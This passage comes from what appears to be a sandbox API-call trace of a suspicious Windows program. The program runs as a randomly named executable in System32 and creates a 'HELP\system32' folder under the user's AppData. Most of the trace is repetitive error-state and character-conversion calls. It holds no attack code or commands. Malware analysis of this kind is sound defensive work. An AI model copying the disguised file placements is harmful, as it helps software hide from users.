() returned 0x0 [0034.271] SetLastError (dwErrCode=0x0) [0034.271] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef1ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.271] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef1ec, cbMultiByte=256, lpWideCharStr=0x1eeb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.271] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.271] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1ee938, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0034.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x1eefec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x13\x95Ðô$ó\x1e", lpUsedDefaultChar=0x0) returned 256 [0034.271] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.271] GetLastError () returned 0x0 [0034.272] SetLastError (dwErrCode=0x0) [0034.272] GetLastError () returned 0x0 [0034.272] SetLastError (dwErrCode=0x0) [0034.272] GetLastError () returned 0x0 [0034.272] SetLastError (dwErrCode=0x0) [0034.272] GetLastError () returned 0x0 [0034.272] SetLastError (dwErrCode=0x0) [0034.272] GetLastError () returned 0x0 [0034.272] SetLastError (dwErrCode=0x0) [0034.272] GetLastError () returned 0x0 [0034.272] SetLastError (dwErrCode=0x0) [0034.272] GetLastError () returned 0x0 [0034.272] SetLastError (dwErrCode=0x0) [0034.272] GetLastError () returned 0x0 [0034.272] SetLastError (dwErrCode=0x0) [0034.272] GetLastError () returned 0x0 [0034.272] SetLastError (dwErrCode=0x0) [0034.272] GetLastError () returned 0x0 [0034.273] SetLastError (dwErrCode=0x0) [0034.273] GetLastError () returned 0x0 [0034.273] SetLastError (dwErrCode=0x0) [0034.273] GetLastError () returned 0x0 [0034.273] SetLastError (dwErrCode=0x0) [0034.273] GetLastError () returned 0x0 [0034.273] SetLastError (dwErrCode=0x0) [0034.273] GetLastError () returned 0x0 [0034.273] SetLastError (dwErrCode=0x0) [0034.273] GetLastError () returned 0x0 [0034.273] SetLastError (dwErrCode=0x0) [0034.273] GetLastError () returned 0x0 [0034.273] SetLastError (dwErrCode=0x0) [0034.273] GetLastError () returned 0x0 [0034.273] SetLastError (dwErrCode=0x0) [0034.273] GetLastError () returned 0x0 [0034.273] SetLastError (dwErrCode=0x0) [0034.273] GetLastError () returned 0x0 [0034.273] SetLastError (dwErrCode=0x0) [0034.273] GetLastError () returned 0x0 [0034.273] SetLastError (dwErrCode=0x0) [0034.273] GetLastError () returned 0x0 [0034.273] SetLastError (dwErrCode=0x0) [0034.273] GetLastError () returned 0x0 [0034.273] SetLastError (dwErrCode=0x0) [0034.273] GetLastError () returned 0x0 [0034.274] SetLastError (dwErrCode=0x0) [0034.274] GetLastError () returned 0x0 [0034.274] SetLastError (dwErrCode=0x0) [0034.274] GetLastError () returned 0x0 [0034.274] SetLastError (dwErrCode=0x0) [0034.274] GetLastError () returned 0x0 [0034.274] SetLastError (dwErrCode=0x0) [0034.274] GetLastError () returned 0x0 [0034.274] SetLastError (dwErrCode=0x0) [0034.274] GetLastError () returned 0x0 [0034.274] SetLastError (dwErrCode=0x0) [0034.274] GetLastError () returned 0x0 [0034.274] SetLastError (dwErrCode=0x0) [0034.274] GetLastError () returned 0x0 [0034.274] SetLastError (dwErrCode=0x0) [0034.274] GetLastError () returned 0x0 [0034.274] SetLastError (dwErrCode=0x0) [0034.274] GetLastError () returned 0x0 [0034.274] SetLastError (dwErrCode=0x0) [0034.274] GetLastError () returned 0x0 [0034.274] SetLastError (dwErrCode=0x0) [0034.274] GetLastError () returned 0x0 [0034.274] SetLastError (dwErrCode=0x0) [0034.274] GetLastError () returned 0x0 [0034.274] SetLastError (dwErrCode=0x0) [0034.274] GetLastError () returned 0x0 [0034.275] SetLastError (dwErrCode=0x0) [0034.275] GetLastError () returned 0x0 [0034.275] SetLastError (dwErrCode=0x0) [0034.275] GetLastError () returned 0x0 [0034.275] SetLastError (dwErrCode=0x0) [0034.275] GetLastError () returned 0x0 [0034.275] SetLastError (dwErrCode=0x0) [0034.275] GetLastError () returned 0x0 [0034.275] SetLastError (dwErrCode=0x0) [0034.275] GetLastError () returned 0x0 [0034.275] SetLastError (dwErrCode=0x0) [0034.275] GetLastError () returned 0x0 [0034.275] SetLastError (dwErrCode=0x0) [0034.275] GetLastError () returned 0x0 [0034.275] SetLastError (dwErrCode=0x0) [0034.275] GetLastError () returned 0x0 [0034.275] SetLastError (dwErrCode=0x0) [0034.275] GetLastError () returned 0x0 [0034.275] SetLastError (dwErrCode=0x0) [0034.275] GetLastError () returned 0x0 [0034.275] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.276] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.276] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.276] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.276] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.276] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.276] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.276] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.276] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.276] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.276] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.276] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.276] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.276] SetLastError (dwErrCode=0x0) [0034.276] GetLastError () returned 0x0 [0034.277] SetLastError (dwErrCode=0x0) [0034.277] GetLastError () returned 0x0 [0034.277] SetLastError (dwErrCode=0x0) [0034.277] GetLastError () returned 0x0 [0034.277] SetLastError (dwErrCode=0x0) [0034.277] GetLastError () returned 0x0 [0034.277] SetLastError (dwErrCode=0x0) [0034.277] GetLastError () returned 0x0 [0034.277] SetLastError (dwErrCode=0x0) [0034.277] GetLastError () returned 0x0 [0034.277] SetLastError (dwErrCode=0x0) [0034.277] GetLastError () returned 0x0 [0034.277] SetLastError (dwErrCode=0x0) [0034.277] GetLastError () returned 0x0 [0034.277] SetLastError (dwErrCode=0x0) [0034.277] GetLastError () returned 0x0 [0034.277] SetLastError (dwErrCode=0x0) [0034.277] GetLastError () returned 0x0 [0034.277] SetLastError (dwErrCode=0x0) [0034.277] GetLastError () returned 0x0 [0034.277] SetLastError (dwErrCode=0x0) [0034.277] GetLastError () returned 0x0 [0034.277] SetLastError (dwErrCode=0x0) [0034.277] GetLastError () returned 0x0 [0034.277] SetLastError (dwErrCode=0x0) [0034.277] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.278] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.278] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.278] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.278] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.278] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.278] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.278] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.278] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.278] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.278] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.278] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.278] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.278] GetLastError () returned 0x0 [0034.278] SetLastError (dwErrCode=0x0) [0034.279] GetLastError () returned 0x0 [0034.279] SetLastError (dwErrCode=0x0) [0034.279] GetLastError () returned 0x0 [0034.279] SetLastError (dwErrCode=0x0) [0034.279] GetLastError () returned 0x0 [0034.279] SetLastError (dwErrCode=0x0) [0034.279] GetLastError () returned 0x0 [0034.279] SetLastError (dwErrCode=0x0) [0034.279] GetLastError () returned 0x0 [0034.279] SetLastError (dwErrCode=0x0) [0034.279] GetLastError () returned 0x0 [0034.279] SetLastError (dwErrCode=0x0) [0034.279] GetLastError () returned 0x0 [0034.279] SetLastError (dwErrCode=0x0) [0034.279] GetLastError () returned 0x0 [0034.279] SetLastError (dwErrCode=0x0) [0034.279] GetLastError () returned 0x0 [0034.279] SetLastError (dwErrCode=0x0) [0034.279] GetLastError () returned 0x0 [0034.279] SetLastError (dwErrCode=0x0) [0034.279] GetLastError () returned 0x0 [0034.279] SetLastError (dwErrCode=0x0) [0034.279] GetLastError () returned 0x0 [0034.279] SetLastError (dwErrCode=0x0) [0034.279] GetLastError () returned 0x0 [0034.279] SetLastError (dwErrCode=0x0) [0034.280] GetLastError () returned 0x0 [0034.280] SetLastError (dwErrCode=0x0) [0034.280] GetLastError () returned 0x0 [0034.280] SetLastError (dwErrCode=0x0) [0034.280] GetLastError () returned 0x0 [0034.280] SetLastError (dwErrCode=0x0) [0034.280] GetLastError () returned 0x0 [0034.280] SetLastError (dwErrCode=0x0) [0034.280] GetLastError () returned 0x0 [0034.280] SetLastError (dwErrCode=0x0) [0034.280] GetLastError () returned 0x0 [0034.280] SetLastError (dwErrCode=0x0) [0034.280] GetLastError () returned 0x0 [0034.280] SetLastError (dwErrCode=0x0) [0034.280] GetLastError () returned 0x0 [0034.280] SetLastError (dwErrCode=0x0) [0034.280] GetLastError () returned 0x0 [0034.280] SetLastError (dwErrCode=0x0) [0034.280] GetLastError () returned 0x0 [0034.280] SetLastError (dwErrCode=0x0) [0034.280] GetLastError () returned 0x0 [0034.280] SetLastError (dwErrCode=0x0) [0034.280] GetLastError () returned 0x0 [0034.280] SetLastError (dwErrCode=0x0) [0034.280] GetLastError () returned 0x0 [0034.281] SetLastError (dwErrCode=0x0) [0034.281] GetLastError () returned 0x0 [0034.281] SetLastError (dwErrCode=0x0) [0034.281] GetLastError () returned 0x0 [0034.281] SetLastError (dwErrCode=0x0) [0034.281] GetLastError () returned 0x0 [0034.281] SetLastError (dwErrCode=0x0) [0034.281] GetLastError () returned 0x0 [0034.281] SetLastError (dwErrCode=0x0) [0034.281] GetLastError () returned 0x0 [0034.281] SetLastError (dwErrCode=0x0) [0034.281] GetLastError () returned 0x0 [0034.281] SetLastError (dwErrCode=0x0) [0034.281] GetLastError () returned 0x0 [0034.281] SetLastError (dwErrCode=0x0) [0034.281] GetLastError () returned 0x0 [0034.281] SetLastError (dwErrCode=0x0) [0034.281] GetLastError () returned 0x0 [0034.281] SetLastError (dwErrCode=0x0) [0034.281] GetLastError () returned 0x0 [0034.281] SetLastError (dwErrCode=0x0) [0034.281] GetLastError () returned 0x0 [0034.281] SetLastError (dwErrCode=0x0) [0034.281] GetLastError () returned 0x0 [0034.281] SetLastError (dwErrCode=0x0) [0034.281] GetLastError () returned 0x0 [0034.282] SetLastError (dwErrCode=0x0) [0034.282] GetLastError () returned 0x0 [0034.282] SetLastError (dwErrCode=0x0) [0034.282] GetLastError () returned 0x0 [0034.282] SetLastError (dwErrCode=0x0) [0034.282] GetLastError () returned 0x0 [0034.282] SetLastError (dwErrCode=0x0) [0034.282] GetLastError () returned 0x0 [0034.282] SetLastError (dwErrCode=0x0) [0034.282] GetLastError () returned 0x0 [0034.282] SetLastError (dwErrCode=0x0) [0034.282] GetLastError () returned 0x0 [0034.282] SetLastError (dwErrCode=0x0) [0034.282] GetLastError () returned 0x0 [0034.282] SetLastError (dwErrCode=0x0) [0034.282] GetLastError () returned 0x0 [0034.282] SetLastError (dwErrCode=0x0) [0034.282] GetLastError () returned 0x0 [0034.282] SetLastError (dwErrCode=0x0) [0034.282] GetLastError () returned 0x0 [0034.282] SetLastError (dwErrCode=0x0) [0034.282] GetLastError () returned 0x0 [0034.282] SetLastError (dwErrCode=0x0) [0034.282] GetLastError () returned 0x0 [0034.282] SetLastError (dwErrCode=0x0) [0034.282] GetLastError () returned 0x0 [0034.283] SetLastError (dwErrCode=0x0) [0034.283] GetLastError () returned 0x0 [0034.283] SetLastError (dwErrCode=0x0) [0034.283] GetLastError () returned 0x0 [0034.283] SetLastError (dwErrCode=0x0) [0034.283] GetLastError () returned 0x0 [0034.283] SetLastError (dwErrCode=0x0) [0034.283] GetLastError () returned 0x0 [0034.283] SetLastError (dwErrCode=0x0) [0034.283] GetLastError () returned 0x0 [0034.283] SetLastError (dwErrCode=0x0) [0034.283] GetLastError () returned 0x0 [0034.283] SetLastError (dwErrCode=0x0) [0034.283] GetLastError () returned 0x0 [0034.283] SetLastError (dwErrCode=0x0) [0034.283] GetLastError () returned 0x0 [0034.283] SetLastError (dwErrCode=0x0) [0034.283] GetLastError () returned 0x0 [0034.283] SetLastError (dwErrCode=0x0) [0034.283] GetLastError () returned 0x0 [0034.283] SetLastError (dwErrCode=0x0) [0034.283] GetLastError () returned 0x0 [0034.283] SetLastError (dwErrCode=0x0) [0034.283] GetLastError () returned 0x0 [0034.283] SetLastError (dwErrCode=0x0) [0034.283] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.284] SetLastError (dwErrCode=0x0) [0034.284] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.285] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.285] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.285] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.285] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.285] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.285] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.285] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.285] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.285] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.285] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.285] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.285] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.285] GetLastError () returned 0x0 [0034.285] SetLastError (dwErrCode=0x0) [0034.286] GetLastError () returned 0x0 [0034.286] SetLastError (dwErrCode=0x0) [0034.286] GetLastError () returned 0x0 [0034.286] SetLastError (dwErrCode=0x0) [0034.286] GetLastError () returned 0x0 [0034.286] SetLastError (dwErrCode=0x0) [0034.286] GetLastError () returned 0x0 [0034.286] SetLastError (dwErrCode=0x0) [0034.286] GetLastError () returned 0x0 [0034.286] SetLastError (dwErrCode=0x0) [0034.286] GetLastError () returned 0x0 [0034.286] SetLastError (dwErrCode=0x0) [0034.286] GetLastError () returned 0x0 [0034.286] SetLastError (dwErrCode=0x0) [0034.286] GetLastError () returned 0x0 [0034.286] SetLastError (dwErrCode=0x0) [0034.286] GetLastError () returned 0x0 [0034.286] SetLastError (dwErrCode=0x0) [0034.286] GetLastError () returned 0x0 [0034.286] SetLastError (dwErrCode=0x0) [0034.286] GetLastError () returned 0x0 [0034.286] SetLastError (dwErrCode=0x0) [0034.286] GetLastError () returned 0x0 [0034.286] SetLastError (dwErrCode=0x0) [0034.286] GetLastError () returned 0x0 [0034.286] SetLastError (dwErrCode=0x0) [0034.287] GetLastError () returned 0x0 [0034.287] SetLastError (dwErrCode=0x0) [0034.287] GetLastError () returned 0x0 [0034.287] SetLastError (dwErrCode=0x0) [0034.287] GetLastError () returned 0x0 [0034.287] SetLastError (dwErrCode=0x0) [0034.287] GetLastError () returned 0x0 [0034.287] SetLastError (dwErrCode=0x0) [0034.287] GetLastError () returned 0x0 [0034.287] SetLastError (dwErrCode=0x0) [0034.287] GetLastError () returned 0x0 [0034.287] SetLastError (dwErrCode=0x0) [0034.287] GetLastError () returned 0x0 [0034.287] SetLastError (dwErrCode=0x0) [0034.287] GetLastError () returned 0x0 [0034.287] SetLastError (dwErrCode=0x0) [0034.287] GetLastError () returned 0x0 [0034.287] SetLastError (dwErrCode=0x0) [0034.287] GetLastError () returned 0x0 [0034.287] SetLastError (dwErrCode=0x0) [0034.287] GetLastError () returned 0x0 [0034.287] SetLastError (dwErrCode=0x0) [0034.287] GetLastError () returned 0x0 [0034.287] SetLastError (dwErrCode=0x0) [0034.287] GetLastError () returned 0x0 [0034.288] SetLastError (dwErrCode=0x0) [0034.288] GetLastError () returned 0x0 [0034.288] SetLastError (dwErrCode=0x0) [0034.288] GetLastError () returned 0x0 [0034.288] SetLastError (dwErrCode=0x0) [0034.288] GetLastError () returned 0x0 [0034.288] SetLastError (dwErrCode=0x0) [0034.288] GetLastError () returned 0x0 [0034.288] SetLastError (dwErrCode=0x0) [0034.288] GetLastError () returned 0x0 [0034.288] SetLastError (dwErrCode=0x0) [0034.288] GetLastError () returned 0x0 [0034.288] SetLastError (dwErrCode=0x0) [0034.288] GetLastError () returned 0x0 [0034.288] SetLastError (dwErrCode=0x0) [0034.288] GetLastError () returned 0x0 [0034.288] SetLastError (dwErrCode=0x0) [0034.289] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0034.289] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0034.289] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0034.290] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef368 | out: lpSystemTimeAsFileTime=0x1ef368*(dwLowDateTime=0xe22096b0, dwHighDateTime=0x1d3dfba)) [0034.291] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ef2a0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.291] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ef188, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetLastError () returned 0x0 [0034.291] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.291] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0034.291] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.292] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.292] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.292] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.292] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0034.292] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0034.292] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0034.292] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0034.292] GetLastError () returned 0xb7 [0034.292] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.292] wsprintfA (in: 